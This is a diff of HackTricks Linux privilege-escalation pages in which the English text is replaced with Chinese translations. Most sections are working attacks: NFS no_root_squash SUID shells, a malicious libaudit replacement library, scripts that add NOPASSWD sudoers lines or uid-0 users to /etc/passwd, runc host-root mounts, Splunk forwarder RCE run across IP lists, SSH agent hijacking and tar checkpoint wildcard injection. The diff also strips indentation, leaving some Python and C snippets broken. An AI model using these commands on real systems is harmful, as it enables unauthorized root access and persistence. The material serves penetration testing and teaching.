Wildcards in configuration paths allow Logstash to execute all matching pipelines in the designated directory. +### 通过可写管道进行权限提升 -### Privilege Escalation via Writable Pipelines +要尝试权限提升,首先识别 Logstash 服务运行的用户,通常是 **logstash** 用户。确保满足 **以下** 条件之一: -To attempt privilege escalation, first identify the user under which the Logstash service is running, typically the **logstash** user. Ensure you meet **one** of these criteria: +- 拥有对管道 **.conf** 文件的 **写访问** **或** +- **/etc/logstash/pipelines.yml** 文件使用了通配符,并且您可以写入目标文件夹 -- Possess **write access** to a pipeline **.conf** file **or** -- The **/etc/logstash/pipelines.yml** file uses a wildcard, and you can write to the target folder +此外,必须满足 **以下** 条件之一: -Additionally, **one** of these conditions must be fulfilled: - -- Capability to restart the Logstash service **or** -- The **/etc/logstash/logstash.yml** file has **config.reload.automatic: true** set - -Given a wildcard in the configuration, creating a file that matches this wildcard allows for command execution. For instance: +- 能够重启 Logstash 服务 **或** +- **/etc/logstash/logstash.yml** 文件设置了 **config.reload.automatic: true** +鉴于配置中存在通配符,创建一个与该通配符匹配的文件允许执行命令。例如: ```bash input { - exec { - command => "whoami" - interval => 120 - } +exec { +command => "whoami" +interval => 120 +} } output { - file { - path => "/tmp/output.log" - codec => rubydebug - } +file { +path => "/tmp/output.log" +codec => rubydebug +} } ``` +这里,**interval** 决定了执行频率(以秒为单位)。在给定的示例中,**whoami** 命令每 120 秒运行一次,其输出被定向到 **/tmp/output.log**。 -Here, **interval** determines the execution frequency in seconds. In the given example, the **whoami** command runs every 120 seconds, with its output directed to **/tmp/output.log**. - -With **config.reload.automatic: true** in **/etc/logstash/logstash.yml**, Logstash will automatically detect and apply new or modified pipeline configurations without needing a restart. If there's no wildcard, modifications can still be made to existing configurations, but caution is advised to avoid disruptions. +在 **/etc/logstash/logstash.yml** 中设置 **config.reload.automatic: true**,Logstash 将自动检测并应用新的或修改过的管道配置,而无需重启。如果没有通配符,仍然可以对现有配置进行修改,但建议谨慎操作以避免中断。 ## References diff --git a/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md b/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md index 679d2a521..9e4411e0d 100644 --- a/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md +++ b/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md @@ -1,19 +1,18 @@ {{#include ../../banners/hacktricks-training.md}} -Read the _ **/etc/exports** _ file, if you find some directory that is configured as **no_root_squash**, then you can **access** it from **as a client** and **write inside** that directory **as** if you were the local **root** of the machine. +阅读 _ **/etc/exports** _ 文件,如果你发现某个目录被配置为 **no_root_squash**,那么你可以 **作为客户端访问** 该目录,并 **像本地的根用户** 一样 **在里面写入**。 -**no_root_squash**: This option basically gives authority to the root user on the client to access files on the NFS server as root. And this can lead to serious security implications. +**no_root_squash**:这个选项基本上赋予客户端的根用户以根身份访问 NFS 服务器上的文件的权限。这可能导致严重的安全隐患。 -**no_all_squash:** This is similar to **no_root_squash** option but applies to **non-root users**. Imagine, you have a shell as nobody user; checked /etc/exports file; no_all_squash option is present; check /etc/passwd file; emulate a non-root user; create a suid file as that user (by mounting using nfs). Execute the suid as nobody user and become different user. +**no_all_squash**:这与 **no_root_squash** 选项类似,但适用于 **非根用户**。想象一下,你以 nobody 用户的身份获得一个 shell;检查 /etc/exports 文件;存在 no_all_squash 选项;检查 /etc/passwd 文件;模拟一个非根用户;以该用户创建一个 suid 文件(通过使用 nfs 挂载)。以 nobody 用户身份执行该 suid 文件并成为不同的用户。 -# Privilege Escalation +# 权限提升 -## Remote Exploit +## 远程利用 -If you have found this vulnerability, you can exploit it: - -- **Mounting that directory** in a client machine, and **as root copying** inside the mounted folder the **/bin/bash** binary and giving it **SUID** rights, and **executing from the victim** machine that bash binary. +如果你发现了这个漏洞,你可以利用它: +- **在客户端机器上挂载该目录**,并 **以根身份复制** /bin/bash 二进制文件到挂载文件夹中,并赋予其 **SUID** 权限,然后 **从受害者** 机器执行该 bash 二进制文件。 ```bash #Attacker, as root user mkdir /tmp/pe @@ -26,9 +25,7 @@ chmod +s bash cd ./bash -p #ROOT shell ``` - -- **Mounting that directory** in a client machine, and **as root copying** inside the mounted folder our come compiled payload that will abuse the SUID permission, give to it **SUID** rights, and **execute from the victim** machine that binary (you can find here some[ C SUID payloads](payloads-to-execute.md#c)). - +- **在客户端机器上挂载该目录**,并且**以root身份复制**我们编译好的有效载荷到挂载文件夹中,这将滥用SUID权限,赋予其**SUID**权限,并**从受害者**机器执行该二进制文件(您可以在这里找到一些[C SUID有效载荷](payloads-to-execute.md#c))。 ```bash #Attacker, as root user gcc payload.c -o payload @@ -42,61 +39,57 @@ chmod +s payload cd ./payload #ROOT shell ``` - -## Local Exploit +## 本地利用 > [!NOTE] -> Note that if you can create a **tunnel from your machine to the victim machine you can still use the Remote version to exploit this privilege escalation tunnelling the required ports**.\ -> The following trick is in case the file `/etc/exports` **indicates an IP**. In this case you **won't be able to use** in any case the **remote exploit** and you will need to **abuse this trick**.\ -> Another required requirement for the exploit to work is that **the export inside `/etc/export`** **must be using the `insecure` flag**.\ -> --_I'm not sure that if `/etc/export` is indicating an IP address this trick will work_-- +> 请注意,如果您可以从您的机器创建一个**到受害者机器的隧道,您仍然可以使用远程版本来利用此权限提升,隧道所需的端口**。\ +> 以下技巧适用于文件`/etc/exports`**指示一个IP**的情况。在这种情况下,您**将无法使用**任何情况下的**远程利用**,您需要**利用这个技巧**。\ +> 另一个利用成功的必要条件是**`/etc/export`中的导出****必须使用`insecure`标志**。\ +> --_我不确定如果`/etc/export`指示一个IP地址,这个技巧是否有效_-- -## Basic Information +## 基本信息 -The scenario involves exploiting a mounted NFS share on a local machine, leveraging a flaw in the NFSv3 specification which allows the client to specify its uid/gid, potentially enabling unauthorized access. The exploitation involves using [libnfs](https://github.com/sahlberg/libnfs), a library that allows for the forging of NFS RPC calls. +该场景涉及利用本地机器上挂载的NFS共享,利用NFSv3规范中的一个缺陷,该缺陷允许客户端指定其uid/gid,可能导致未经授权的访问。利用过程涉及使用[libnfs](https://github.com/sahlberg/libnfs),这是一个允许伪造NFS RPC调用的库。 -### Compiling the Library - -The library compilation steps might require adjustments based on the kernel version. In this specific case, the fallocate syscalls were commented out. The compilation process involves the following commands: +### 编译库 +库的编译步骤可能需要根据内核版本进行调整。在这种特定情况下,fallocate系统调用被注释掉。编译过程涉及以下命令: ```bash ./bootstrap ./configure make gcc -fPIC -shared -o ld_nfs.so examples/ld_nfs.c -ldl -lnfs -I./include/ -L./lib/.libs/ ``` +### 进行利用 -### Conducting the Exploit +该利用涉及创建一个简单的 C 程序 (`pwn.c`),该程序提升权限到 root,然后执行一个 shell。程序被编译,生成的二进制文件 (`a.out`) 被放置在具有 suid root 的共享上,使用 `ld_nfs.so` 在 RPC 调用中伪造 uid: -The exploit involves creating a simple C program (`pwn.c`) that elevates privileges to root and then executing a shell. The program is compiled, and the resulting binary (`a.out`) is placed on the share with suid root, using `ld_nfs.so` to fake the uid in the RPC calls: +1. **编译利用代码:** -1. **Compile the exploit code:** +```bash +cat pwn.c +int main(void){setreuid(0,0); system("/bin/bash"); return 0;} +gcc pwn.c -o a.out +``` - ```bash - cat pwn.c - int main(void){setreuid(0,0); system("/bin/bash"); return 0;} - gcc pwn.c -o a.out - ``` +2. **将利用放置在共享上并通过伪造 uid 修改其权限:** -2. **Place the exploit on the share and modify its permissions by faking the uid:** +```bash +LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so cp ../a.out nfs://nfs-server/nfs_root/ +LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chown root: nfs://nfs-server/nfs_root/a.out +LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod o+rx nfs://nfs-server/nfs_root/a.out +LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod u+s nfs://nfs-server/nfs_root/a.out +``` - ```bash - LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so cp ../a.out nfs://nfs-server/nfs_root/ - LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chown root: nfs://nfs-server/nfs_root/a.out - LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod o+rx nfs://nfs-server/nfs_root/a.out - LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod u+s nfs://nfs-server/nfs_root/a.out - ``` +3. **执行利用以获得 root 权限:** +```bash +/mnt/share/a.out +#root +``` -3. **Execute the exploit to gain root privileges:** - ```bash - /mnt/share/a.out - #root - ``` - -## Bonus: NFShell for Stealthy File Access - -Once root access is obtained, to interact with the NFS share without changing ownership (to avoid leaving traces), a Python script (nfsh.py) is used. This script adjusts the uid to match that of the file being accessed, allowing for interaction with files on the share without permission issues: +## 额外:NFShell 用于隐秘文件访问 +一旦获得 root 访问权限,为了在不更改所有权的情况下与 NFS 共享进行交互(以避免留下痕迹),使用一个 Python 脚本 (nfsh.py)。该脚本调整 uid 以匹配被访问文件的 uid,从而允许在共享上与文件进行交互而不出现权限问题: ```python #!/usr/bin/env python # script from https://www.errno.fr/nfs_privesc.html @@ -104,23 +97,20 @@ import sys import os def get_file_uid(filepath): - try: - uid = os.stat(filepath).st_uid - except OSError as e: - return get_file_uid(os.path.dirname(filepath)) - return uid +try: +uid = os.stat(filepath).st_uid +except OSError as e: +return get_file_uid(os.path.dirname(filepath)) +return uid filepath = sys.argv[-1] uid = get_file_uid(filepath) os.setreuid(uid, uid) os.system(' '.join(sys.argv[1:])) ``` - -Run like: - +像这样运行: ```bash # ll ./mount/ drwxr-x--- 6 1008 1009 1024 Apr 5 2017 9.3_old ``` - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/payloads-to-execute.md b/src/linux-hardening/privilege-escalation/payloads-to-execute.md index 37626a2de..ea0125210 100644 --- a/src/linux-hardening/privilege-escalation/payloads-to-execute.md +++ b/src/linux-hardening/privilege-escalation/payloads-to-execute.md @@ -1,22 +1,19 @@ -# Payloads to execute +# 执行的有效载荷 {{#include ../../banners/hacktricks-training.md}} ## Bash - ```bash cp /bin/bash /tmp/b && chmod +s /tmp/b /bin/b -p #Maintains root privileges from suid, working in debian & buntu ``` - ## C - ```c //gcc payload.c -o payload int main(void){ - setresuid(0, 0, 0); //Set as user suid user - system("/bin/sh"); - return 0; +setresuid(0, 0, 0); //Set as user suid user +system("/bin/sh"); +return 0; } ``` @@ -27,9 +24,9 @@ int main(void){ #include int main(){ - setuid(getuid()); - system("/bin/bash"); - return 0; +setuid(getuid()); +system("/bin/bash"); +return 0; } ``` @@ -40,42 +37,38 @@ int main(){ #include int main(void) { - char *const paramList[10] = {"/bin/bash", "-p", NULL}; - const int id = 1000; - setresuid(id, id, id); - execve(paramList[0], paramList, NULL); - return 0; +char *const paramList[10] = {"/bin/bash", "-p", NULL}; +const int id = 1000; +setresuid(id, id, id); +execve(paramList[0], paramList, NULL); +return 0; } ``` +## 通过覆盖文件来提升权限 -## Overwriting a file to escalate privileges +### 常见文件 -### Common files +- 在 _/etc/passwd_ 中添加带密码的用户 +- 在 _/etc/shadow_ 中更改密码 +- 在 _/etc/sudoers_ 中将用户添加到 sudoers +- 通过 docker socket 滥用 docker,通常在 _/run/docker.sock_ 或 _/var/run/docker.sock_ 中 -- Add user with password to _/etc/passwd_ -- Change password inside _/etc/shadow_ -- Add user to sudoers in _/etc/sudoers_ -- Abuse docker through the docker socket, usually in _/run/docker.sock_ or _/var/run/docker.sock_ - -### Overwriting a library - -Check a library used by some binary, in this case `/bin/su`: +### 覆盖库 +检查某个二进制文件使用的库,在这种情况下是 `/bin/su`: ```bash ldd /bin/su - linux-vdso.so.1 (0x00007ffef06e9000) - libpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000) - libpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000) - libaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 (0x00007fe473249000) - libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000) - libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000) - libcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000) - /lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000) +linux-vdso.so.1 (0x00007ffef06e9000) +libpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000) +libpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000) +libaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 (0x00007fe473249000) +libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000) +libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000) +libcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000) +/lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000) ``` - -In this case lets try to impersonate `/lib/x86_64-linux-gnu/libaudit.so.1`.\ -So, check for functions of this library used by the **`su`** binary: - +在这种情况下,让我们尝试伪装 `/lib/x86_64-linux-gnu/libaudit.so.1`。\ +因此,检查 **`su`** 二进制文件使用的此库的函数: ```bash objdump -T /bin/su | grep audit 0000000000000000 DF *UND* 0000000000000000 audit_open @@ -83,9 +76,7 @@ objdump -T /bin/su | grep audit 0000000000000000 DF *UND* 0000000000000000 audit_log_acct_message 000000000020e968 g DO .bss 0000000000000004 Base audit_fd ``` - -The symbols `audit_open`, `audit_log_acct_message`, `audit_log_acct_message` and `audit_fd` are probably from the libaudit.so.1 library. As the libaudit.so.1 will be overwritten by the malicious shared library, these symbols should be present in the new shared library, otherwise the program will not be able to find the symbol and will exit. - +符号 `audit_open`、`audit_log_acct_message`、`audit_log_acct_message` 和 `audit_fd` 可能来自 libaudit.so.1 库。由于 libaudit.so.1 将被恶意共享库覆盖,因此这些符号应该出现在新的共享库中,否则程序将无法找到该符号并将退出。 ```c #include #include @@ -102,34 +93,27 @@ void inject()__attribute__((constructor)); void inject() { - setuid(0); - setgid(0); - system("/bin/bash"); +setuid(0); +setgid(0); +system("/bin/bash"); } ``` +现在,只需调用 **`/bin/su`** 您将获得一个以 root 身份运行的 shell。 -Now, just calling **`/bin/su`** you will obtain a shell as root. +## 脚本 -## Scripts - -Can you make root execute something? - -### **www-data to sudoers** +您能让 root 执行某些操作吗? +### **www-data 到 sudoers** ```bash echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update ``` - -### **Change root password** - +### **更改根密码** ```bash echo "root:hacked" | chpasswd ``` - -### Add new root user to /etc/passwd - +### 将新根用户添加到 /etc/passwd ```bash echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd ``` - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/runc-privilege-escalation.md b/src/linux-hardening/privilege-escalation/runc-privilege-escalation.md index e54915fa9..263698678 100644 --- a/src/linux-hardening/privilege-escalation/runc-privilege-escalation.md +++ b/src/linux-hardening/privilege-escalation/runc-privilege-escalation.md @@ -1,10 +1,10 @@ -# RunC Privilege Escalation +# RunC 提权 {{#include ../../banners/hacktricks-training.md}} -## Basic information +## 基本信息 -If you want to learn more about **runc** check the following page: +如果你想了解更多关于 **runc** 的信息,请查看以下页面: {{#ref}} ../../network-services-pentesting/2375-pentesting-docker.md @@ -12,22 +12,21 @@ If you want to learn more about **runc** check the following page: ## PE -If you find that `runc` is installed in the host you may be able to **run a container mounting the root / folder of the host**. - +如果你发现 `runc` 已安装在主机上,你可能能够 **运行一个挂载主机根 / 文件夹的容器**。 ```bash runc -help #Get help and see if runc is intalled runc spec #This will create the config.json file in your current folder Inside the "mounts" section of the create config.json add the following lines: { - "type": "bind", - "source": "/", - "destination": "/", - "options": [ - "rbind", - "rw", - "rprivate" - ] +"type": "bind", +"source": "/", +"destination": "/", +"options": [ +"rbind", +"rw", +"rprivate" +] }, #Once you have modified the config.json file, create the folder rootfs in the same directory @@ -37,8 +36,7 @@ mkdir rootfs # The root folder is the one from the host runc run demo ``` - > [!CAUTION] -> This won't always work as the default operation of runc is to run as root, so running it as an unprivileged user simply cannot work (unless you have a rootless configuration). Making a rootless configuration the default isn't generally a good idea because there are quite a few restrictions inside rootless containers that don't apply outside rootless containers. +> 这并不总是有效,因为 runc 的默认操作是以 root 身份运行,因此以非特权用户身份运行它根本无法工作(除非您有无根配置)。将无根配置设为默认通常不是一个好主意,因为在无根容器内有相当多的限制,而这些限制在无根容器外并不适用。 {{#include ../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/selinux.md b/src/linux-hardening/privilege-escalation/selinux.md index 548f3d785..1a3173d8a 100644 --- a/src/linux-hardening/privilege-escalation/selinux.md +++ b/src/linux-hardening/privilege-escalation/selinux.md @@ -1,13 +1,12 @@ {{#include ../../banners/hacktricks-training.md}} -# SELinux in Containers +# 容器中的SELinux -[Introduction and example from the redhat docs](https://www.redhat.com/sysadmin/privileged-flag-container-engines) +[来自redhat文档的介绍和示例](https://www.redhat.com/sysadmin/privileged-flag-container-engines) -[SELinux](https://www.redhat.com/en/blog/latest-container-exploit-runc-can-be-blocked-selinux) is a **labeling** **system**. Every **process** and every **file** system object has a **label**. SELinux policies define rules about what a **process label is allowed to do with all of the other labels** on the system. - -Container engines launch **container processes with a single confined SELinux label**, usually `container_t`, and then set the container inside of the container to be labeled `container_file_t`. The SELinux policy rules basically say that the **`container_t` processes can only read/write/execute files labeled `container_file_t`**. If a container process escapes the container and attempts to write to content on the host, the Linux kernel denies access and only allows the container process to write to content labeled `container_file_t`. +[SELinux](https://www.redhat.com/en/blog/latest-container-exploit-runc-can-be-blocked-selinux) 是一个**标签** **系统**。每个**进程**和每个**文件**系统对象都有一个**标签**。SELinux策略定义了关于**进程标签可以对系统上所有其他标签执行的操作**的规则。 +容器引擎以单个受限的SELinux标签启动**容器进程**,通常为`container_t`,然后将容器内部的容器设置为标签`container_file_t`。SELinux策略规则基本上表示**`container_t`进程只能读取/写入/执行标记为`container_file_t`的文件**。如果容器进程逃离容器并尝试写入主机上的内容,Linux内核将拒绝访问,并仅允许容器进程写入标记为`container_file_t`的内容。 ```shell $ podman run -d fedora sleep 100 d4194babf6b877c7100e79de92cd6717166f7302113018686cea650ea40bd7cb @@ -15,9 +14,8 @@ $ podman top -l label LABEL system_u:system_r:container_t:s0:c647,c780 ``` +# SELinux 用户 -# SELinux Users - -There are SELinux users in addition to the regular Linux users. SELinux users are part of an SELinux policy. Each Linux user is mapped to a SELinux user as part of the policy. This allows Linux users to inherit the restrictions and security rules and mechanisms placed on SELinux users. +除了常规的 Linux 用户,还有 SELinux 用户。SELinux 用户是 SELinux 策略的一部分。每个 Linux 用户都映射到一个 SELinux 用户,作为策略的一部分。这允许 Linux 用户继承施加在 SELinux 用户上的限制和安全规则与机制。 {{#include ../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/socket-command-injection.md b/src/linux-hardening/privilege-escalation/socket-command-injection.md index 3b5a9002d..2da77c5a8 100644 --- a/src/linux-hardening/privilege-escalation/socket-command-injection.md +++ b/src/linux-hardening/privilege-escalation/socket-command-injection.md @@ -1,9 +1,8 @@ {{#include ../../banners/hacktricks-training.md}} -## Socket binding example with Python - -In the following example a **unix socket is created** (`/tmp/socket_test.s`) and everything **received** is going to be **executed** by `os.system`.I know that you aren't going to find this in the wild, but the goal of this example is to see how a code using unix sockets looks like, and how to manage the input in the worst case possible. +## 使用 Python 的 Socket 绑定示例 +在以下示例中,**创建了一个 unix socket** (`/tmp/socket_test.s`),并且所有**接收到的内容**都将由 `os.system` **执行**。我知道你在现实中不会找到这个,但这个示例的目的是展示使用 unix sockets 的代码是如何的,以及在最糟糕的情况下如何处理输入。 ```python:s.py import socket import os, os.path @@ -11,34 +10,29 @@ import time from collections import deque if os.path.exists("/tmp/socket_test.s"): - os.remove("/tmp/socket_test.s") +os.remove("/tmp/socket_test.s") server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) server.bind("/tmp/socket_test.s") os.system("chmod o+w /tmp/socket_test.s") while True: - server.listen(1) - conn, addr = server.accept() - datagram = conn.recv(1024) - if datagram: - print(datagram) - os.system(datagram) - conn.close() +server.listen(1) +conn, addr = server.accept() +datagram = conn.recv(1024) +if datagram: +print(datagram) +os.system(datagram) +conn.close() ``` - -**Execute** the code using python: `python s.py` and **check how the socket is listening**: - +**执行**代码使用python: `python s.py` 并**检查socket的监听状态**: ```python netstat -a -p --unix | grep "socket_test" (Not all processes could be identified, non-owned process info - will not be shown, you would have to be root to see it all.) +will not be shown, you would have to be root to see it all.) unix 2 [ ACC ] STREAM LISTENING 901181 132748/python /tmp/socket_test.s ``` - -**Exploit** - +**利用** ```python echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;" | socat - UNIX-CLIENT:/tmp/socket_test.s ``` - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md b/src/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md index 11d4253c5..099ec3f76 100644 --- a/src/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md +++ b/src/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md @@ -1,52 +1,50 @@ -# Splunk LPE and Persistence +# Splunk LPE 和持久性 {{#include ../../banners/hacktricks-training.md}} -If **enumerating** a machine **internally** or **externally** you find **Splunk running** (port 8090), if you luckily know any **valid credentials** you can **abuse the Splunk service** to **execute a shell** as the user running Splunk. If root is running it, you can escalate privileges to root. +如果在**内部**或**外部**枚举一台机器时发现**Splunk正在运行**(端口8090),如果你幸运地知道任何**有效凭据**,你可以**利用Splunk服务**以运行Splunk的用户身份**执行一个shell**。如果是root在运行,你可以提升权限到root。 -Also if you are **already root and the Splunk service is not listening only on localhost**, you can **steal** the **password** file **from** the Splunk service and **crack** the passwords, or **add new** credentials to it. And maintain persistence on the host. +此外,如果你**已经是root并且Splunk服务不仅在localhost上监听**,你可以**窃取**Splunk服务的**密码**文件并**破解**密码,或者**添加新的**凭据。并在主机上保持持久性。 -In the first image below you can see how a Splunkd web page looks like. +在下面的第一张图片中,你可以看到Splunkd网页的样子。 -## Splunk Universal Forwarder Agent Exploit Summary +## Splunk Universal Forwarder Agent 漏洞总结 -For further details check the post [https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/). This is just a sumary: +有关更多详细信息,请查看帖子 [https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/)。这只是一个总结: -**Exploit Overview:** -An exploit targeting the Splunk Universal Forwarder Agent (UF) allows attackers with the agent password to execute arbitrary code on systems running the agent, potentially compromising an entire network. +**漏洞概述:** +针对Splunk Universal Forwarder Agent (UF) 的漏洞允许拥有代理密码的攻击者在运行该代理的系统上执行任意代码,可能会危及整个网络。 -**Key Points:** +**关键点:** -- The UF agent does not validate incoming connections or the authenticity of code, making it vulnerable to unauthorized code execution. -- Common password acquisition methods include locating them in network directories, file shares, or internal documentation. -- Successful exploitation can lead to SYSTEM or root level access on compromised hosts, data exfiltration, and further network infiltration. +- UF代理不验证传入连接或代码的真实性,使其容易受到未经授权的代码执行攻击。 +- 常见的密码获取方法包括在网络目录、文件共享或内部文档中查找。 +- 成功利用可能导致在受损主机上获得SYSTEM或root级别的访问权限、数据外泄和进一步的网络渗透。 -**Exploit Execution:** +**漏洞执行:** -1. Attacker obtains the UF agent password. -2. Utilizes the Splunk API to send commands or scripts to the agents. -3. Possible actions include file extraction, user account manipulation, and system compromise. +1. 攻击者获取UF代理密码。 +2. 利用Splunk API向代理发送命令或脚本。 +3. 可能的操作包括文件提取、用户账户操作和系统妥协。 -**Impact:** +**影响:** -- Full network compromise with SYSTEM/root level permissions on each host. -- Potential for disabling logging to evade detection. -- Installation of backdoors or ransomware. - -**Example Command for Exploitation:** +- 在每个主机上完全网络妥协,具有SYSTEM/root级别的权限。 +- 可能禁用日志记录以逃避检测。 +- 安装后门或勒索软件。 +**利用示例命令:** ```bash for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done ``` - -**Usable public exploits:** +**可用的公共漏洞:** - https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2 - https://www.exploit-db.com/exploits/46238 - https://www.exploit-db.com/exploits/46487 -## Abusing Splunk Queries +## 滥用 Splunk 查询 -**For further details check the post [https://blog.hrncirik.net/cve-2023-46214-analysis](https://blog.hrncirik.net/cve-2023-46214-analysis)** +**有关更多详细信息,请查看帖子 [https://blog.hrncirik.net/cve-2023-46214-analysis](https://blog.hrncirik.net/cve-2023-46214-analysis)** {{#include ../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md b/src/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md index 774e13999..5d46e1f90 100644 --- a/src/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md +++ b/src/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md @@ -1,30 +1,26 @@ {{#include ../../banners/hacktricks-training.md}} -# Summary - -What can you do if you discover inside the `/etc/ssh_config` or inside `$HOME/.ssh/config` configuration this: +# 总结 +如果您在 `/etc/ssh_config` 或 `$HOME/.ssh/config` 配置中发现以下内容,您可以做些什么: ``` ForwardAgent yes ``` +如果你在机器内是 root,你可能可以 **访问任何代理所建立的 ssh 连接**,只要你能在 _/tmp_ 目录中找到它。 -If you are root inside the machine you can probably **access any ssh connection made by any agent** that you can find in the _/tmp_ directory - -Impersonate Bob using one of Bob's ssh-agent: - +使用 Bob 的其中一个 ssh-agent 冒充 Bob: ```bash SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston ``` +## 为什么这有效? -## Why does this work? +当你设置变量 `SSH_AUTH_SOCK` 时,你正在访问 Bob 在其 ssh 连接中使用的密钥。然后,如果他的私钥仍然存在(通常是),你将能够使用它访问任何主机。 -When you set the variable `SSH_AUTH_SOCK` you are accessing the keys of Bob that have been used in Bobs ssh connection. Then, if his private key is still there (normally it will be), you will be able to access any host using it. +由于私钥以未加密的形式保存在代理的内存中,我想如果你是 Bob,但不知道私钥的密码,你仍然可以访问代理并使用它。 -As the private key is saved in the memory of the agent uncrypted, I suppose that if you are Bob but you don't know the password of the private key, you can still access the agent and use it. +另一种选择是,代理的用户所有者和 root 可能能够访问代理的内存并提取私钥。 -Another option, is that the user owner of the agent and root may be able to access the memory of the agent and extract the private key. +# 长篇解释和利用 -# Long explanation and exploitation - -**Check the [original research here](https://www.clockwork.com/insights/ssh-agent-hijacking/)** +**查看 [原始研究](https://www.clockwork.com/insights/ssh-agent-hijacking/)** {{#include ../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md b/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md index d497174d6..3e6f0fdf0 100644 --- a/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md +++ b/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md @@ -2,71 +2,59 @@ ## chown, chmod -You can **indicate which file owner and permissions you want to copy for the rest of the files** - +您可以**指示要为其余文件复制的文件所有者和权限** ```bash touch "--reference=/my/own/path/filename" ``` - -You can exploit this using [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(combined attack)_\ -More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) +您可以利用此漏洞使用 [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(组合攻击)_\ +更多信息请参见 [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) ## Tar -**Execute arbitrary commands:** - +**执行任意命令:** ```bash touch "--checkpoint=1" touch "--checkpoint-action=exec=sh shell.sh" ``` - -You can exploit this using [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(tar attack)_\ -More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) +您可以利用这个使用 [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(tar 攻击)_\ +更多信息请参见 [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) ## Rsync -**Execute arbitrary commands:** - +**执行任意命令:** ```bash Interesting rsync option from manual: - -e, --rsh=COMMAND specify the remote shell to use - --rsync-path=PROGRAM specify the rsync to run on remote machine +-e, 